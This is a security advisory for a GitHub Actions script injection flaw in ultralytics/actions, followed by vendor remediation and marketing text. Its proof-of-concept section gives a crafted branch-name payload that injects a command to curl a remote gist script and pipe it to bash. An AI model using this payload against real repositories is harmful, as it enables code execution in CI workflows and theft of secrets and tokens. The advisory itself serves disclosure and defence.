GHSA-7x29-qqmq-v6qc
CRITICALGitHub Actions Script Injection in `ultralytics/actions`
Blast Radius
ultralytics/actionsReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects GitHub Actions packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The Ultralytics action available at https://github.com/marketplace/actions/ultralytics-actions is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the pull_request_target trigger, then an attacker can inject arbitrary code into that workflow using a crafted branch name.
Details
The issue exists because the action.yml is a composite action and uses certain fields by GitHub context expression within a run step:
echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
echo "github.ref: ${{ github.ref }}"
echo "github.head_ref: ${{ github.head_ref }}"
echo "github.base_ref: ${{ github.base_ref }}"
In this case, github.head_ref and github.event.pull_request.head.ref are user controlled and can be used to inject code.
PoC
-
Create a fork of any repository that uses
ultralytics/actionswithin a workflow that runs onpull_request_target. -
In the fork create a branch as an injection payload, e.g.:
Hacked";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash -
Create a draft pull request.
-
If the action is reachable, then achieve arbitrary code execution.
See my full POC here (https://github.com/AdnaneKhan/Ultralytics_POC/actions/runs/9733997201 and https://github.com/AdnaneKhan/Ultralytics_POC), where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.
Impact
Any workflow that uses the action and runs on pull_request_target is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the GITHUB_TOKEN or steal secrets from the workflow.
Fix
Sanitize the user-controlled variables using environment vars.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦GitHub Actions | ultralytics/actions | all versions | 0.0.3 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for ultralytics/actions. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update ultralytics/actions to 0.0.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7x29-qqmq-v6qc is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-7x29-qqmq-v6qc is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-7x29-qqmq-v6qc. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-7x29-qqmq-v6qc in your dependencies?
O3 detects GHSA-7x29-qqmq-v6qc across GitHub Actions dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.